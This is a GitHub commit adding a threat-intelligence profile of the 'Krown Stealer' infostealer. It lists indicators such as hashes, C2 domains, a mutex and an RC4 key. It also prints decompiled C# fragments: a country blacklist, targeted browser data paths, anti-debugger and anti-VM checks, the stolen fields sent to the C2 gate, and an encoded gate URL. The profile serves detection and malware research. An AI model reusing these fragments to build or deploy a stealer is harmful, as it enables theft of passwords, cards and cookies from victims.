1 parent
cd0bd78
commit 6d3163a
Showing
1 changed file
with
246 additions
and
0 deletions.
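--- /dev/null
+++ b/<file path not shown on page>
@@ -0,0 +1,246 @@
+# Krown Stealer
+
+## Developer:
+https://t.me/expl01t_z
+
+## Deepweb forums:
+```
+https://skynetzone.org/threads/krown-stealer-tvoj-vybor-na-rynke.14703/
+https://xakerpro.ru/topic/10355/
+https://teletype.in/@exploit_dar/rJcbPLamB
+https://teletype.in/@exploit_dar/rkQLnoAFH
+```
+
+## Hashes
+30485e32f095374168c12454fea8c8175c9233a6a800f1985f702e04ed2630f5
+fa4204a84e4ccc0a3b4603e053dacf4f0d153844f8bcf2af597c35962eb9ffb6
+a0430d8c9fea6603ef8a512542e3c8863aa67c594bf09b718c29d630006a03a5
+3a666cdb9d44450daf89c27fdf11e9a35a075cb92e77b45f2fd13481debdac4d
+b43af2361cfffe0046c94f566487b5de16b958a3da8bfcc20e789c42cdd5fecc
+8b208fd67c36ecaa43988049edcf136f6cd8b86423a8d158c9929aca8da049d9
+dc453a73c59e9cd4cad5c6f80b3d0835fb48b61e8599b64287b375e0a484b3b0
+34b0d0fef7ce3b70e8cdaaaf78273ec834b461897dda4c7c5a31a689e2a218f5
+1bb68089b70a2e1de747550da79010fd0594ff368678c04a0e9496b5b31a7f6e
+29ec8a562965da7e029a785a784f8ee4e530e1ea62f01e321430aa16264a8815
+db6c38e55ef827e159d8ba5b0030520ea081e0f47deab544ac2e0fa163a8bf65
+cc83bf122b4e8be42a8d35d264d7768d218211b197bb54293c26a7b237bfda82
+db783c3c806e08298d907f39fdc6bcd846821c4d702c6a4c96459631f2b2bb38
+fc1e2e7cfbded57dc58e3469fdda8f52737d1853b432f83b9acc92f723373eda
+
+## C2 servers:
+```
+185.228.232.72
+a0362255.xsph.ru
+deathgame.net
+exporhub.pp.ua
+gamefpsbuster.ru
+h143466.s22.test-hf.su
+```
+
+## C2 response:
+```
+1,1,1,1,1,1,1,1,.cs:.log:.txt:.doc:.docx:.cpp:.sql,1001,1,https://h143466.s22.test-hf.su//update//svupdate.exe,1
+```
+
+## C2 resources:
+```
+apps/
+config.php
+assets/
+auth.php
+BD.sql
+converter.php
+dashboard.php
+footer.template
+gate.php
+header.template
+index.php
+logout.php
+presets.php
+profiles.php
+search.php
+settings.php
+users.php
+viewer.php
+```
+
+## ITW names:
+```
+D1onis.exe
+```
+
+## Internet check-in:
+```
+ip.42.pl/raw
+```
+
+## Mutex:
+```
+\AppData\Local\Temp\admin.krown
+```
+
+## RC4 key:
+```
+private static int key = 666;
+```
+
+## Source code:
+### Mutex:
+```
+public static void MutexCheck()
+{
+try
+{
+if (File.Exists(Dirs.Temp + "\\" + Environment.UserName + ".krown"))
+{
+Helpers.Suicide();
+Environment.Exit(0);
+}
+else
+{
+File.Create(Dirs.Temp + "\\" + Environment.UserName + ".krown");
+}
+}
+catch
+{
+}
+}
+```
+
+### Country blacklist:
+```
+Dirs.BlackList = new string[]
+{
+"ru",
+"uk",
+"be",
+"kz",
+"ka",
+"ky",
+"uz"
+};
+```
+
+### Hardcoded supported browsers:
+```
+Dirs.BrowsCC = new string[]
+{
+Dirs.LocalAppData + "\\Google\\Chrome\\User Data\\Default\\" + Dirs.WebData,
+Dirs.AppData + "\\Opera Software\\Opera Stable\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Kometa\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Orbitum\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Comodo\\Dragon\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Amigo\\User\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Torch\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\CentBrowser\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Go!\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\uCozMedia\\Uran\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\MapleStudio\\ChromePlus\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Yandex\\YandexBrowser\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\BlackHawk\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\AcWebBrowser\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\CoolNovo\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Epic Browser\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Baidu Spark\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Rockmelt\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Sleipnir\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\SRWare Iron\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Titan Browser\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Flock\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Vivaldi\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Sputnik\\User Data\\Default\\" + Dirs.WebData,
+Dirs.LocalAppData + "\\Maxthon\\User Data\\Default\\" + Dirs.WebData
+};
+```
+
+```
+public static string[] Processes = new string[]
+{
+"HttpAnalyzer",
+"Dumper",
+"Reflector",
+"Wireshark",
+"WPE",
+"ProcessExplorer",
+"IDA",
+"HTTP Debugger Pro",
+"The Wireshark Network Analyzer",
+"WinDbg",
+"Colasoft Capsa",
+"smsniff",
+"Olly",
+"OllyDbg",
+"WPE PRO",
+"Microsoft Network Monitor",
+"Fiddler",
+"SmartSniff",
+"Immunity Debugger",
+"Process Explorer",
+"PE Tools",
+"AQtime",
+"DS-5 Debug",
+"Dbxtool",
+"Topaz",
+"FusionDebug",
+"NetBeans",
+"Rational Purify",
+".NET Reflector",
+"Cheat Engine",
+"Sigma Engine"
+};
+```
+
+## Anti-VM:
+```
+public static void SandboxieDetect()
+{
+if (AntiAnalyses.GetModuleHandle("SbieDll.dll").ToInt32() != 0)
+{
+Environment.Exit(0);
+}
+}
+```
+
+```
+public static void VMDetect()
+{
+using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
+{
+using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
+{
+foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
+{
+string text = managementBaseObject["Manufacturer"].ToString().ToLower();
+if ((text == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || text.Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox")
+{
+Environment.Exit(0);
+}
+}
+}
+}
+}
+```
+
+## C2 POST data:
+```
+Post_File.name.Add("hwid", hwid);
+Post_File.name.Add("os", value2);
+Post_File.name.Add("platform", value);
+Post_File.name.Add("profile", value3);
+Post_File.name.Add("user", Environment.UserName);
+Post_File.name.Add("passwordsCount", value4);
+Post_File.name.Add("cccount", value5);
+Post_File.name.Add("ccount", value9);
+Post_File.name.Add("fcount", "null");
+Post_File.name.Add("telegram", value6);
+Post_File.name.Add("cookies", value7);
+Post_File.name.Add("steam", value8);
+```
+
+## Encryption:
+```
+string target = "ʰʷˉ˞˜ʷ˩˾ʰ˼ʷʰ˞ˉ˜ʷʰʷʷ˼ʰʷ˜ʰʷ˜ʰ˒ʷ˜ʰʰʰʨʷʰʷʰʷʰʨʷʰʷʰ˿˜˾˩˼ˣ˯˳˃˞˜ˏ˓˃˯˳˼ˣʩʩʩʷʷʷʷ";
+byte[] data = Program.StringToByteArray("687474703a2f2f646561746867616d652e6e65742f676174652e706870");
+byte[] bytes = Encoding.Default.GetBytes(Encrypt.XOR(target));
+string @string = Encoding.Default.GetString(Encrypt.Encrypt_RC4(bytes, data));
+```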